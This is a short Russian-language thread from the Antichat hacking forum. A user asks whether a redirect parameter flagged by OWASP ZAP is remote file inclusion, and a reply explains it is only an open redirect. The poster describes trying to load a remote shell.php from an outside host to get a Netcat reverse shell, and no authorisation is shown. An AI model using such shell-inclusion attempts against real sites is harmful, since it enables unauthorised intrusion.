ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Подскажите насчет найденной уязвимости (https://forum.antichat.xyz/showthread.php?t=580266)

gilo20 19.07.2022 00:40

Нашел уязвимость c помощью owasp zap, выдало как RFI, но не уверен, что это так.
Параметр страницы:
currency_code=&redirect=http%3A%2F%2Fwww.google.co m%2F, и редиректит на страницу гугл.

Пытался залить шелл:
currency_code=&redirect=http://ip/shell.php, файл скачивает, но с помощью Netcat обратную оболочку не дает.
С чем это связано, и есть ли тут вообще RFI или только OPEN REDIRECT?

larchik 19.07.2022 12:38

Цитата:


gilo20 сказал(а):

есть ли тут вообще RFI или только OPEN REDIRECT?


Судя по всему, только редирект. Если бы был RFI, то тебя не ридеректило бы, а вместо этого содержимое гугл-страницы отображалось бы на странице целевого сайта.
На удаленном сервере http://ip/ (где shell.php) подними веб сервер:
Код:

python3 -m http.server 8000
и подставь адрес http://ip:8000/ в параметр redirect твоего запроса. На удаленном сервере скорее всего увидишь свой собственный ip и юзер-агент.

gilo20 20.07.2022 11:10

Цитата:


larchik сказал(а):

Судя по всему, только редирект. Если бы был RFI, то тебя не ридеректило бы, а вместо этого содержимое гугл-страницы отображалось бы на странице целевого сайта.
На удаленном сервере http://ip/ (где shell.php) подними веб сервер:
Код:

python3 -m http.server 8000
и подставь адрес http://ip:8000/ в параметр redirect твоего запроса. На удаленном сервере скорее всего увидишь свой собственный ip и юзер-агент.


Да, спасибо. Только редирект оказался.


Время: 02:15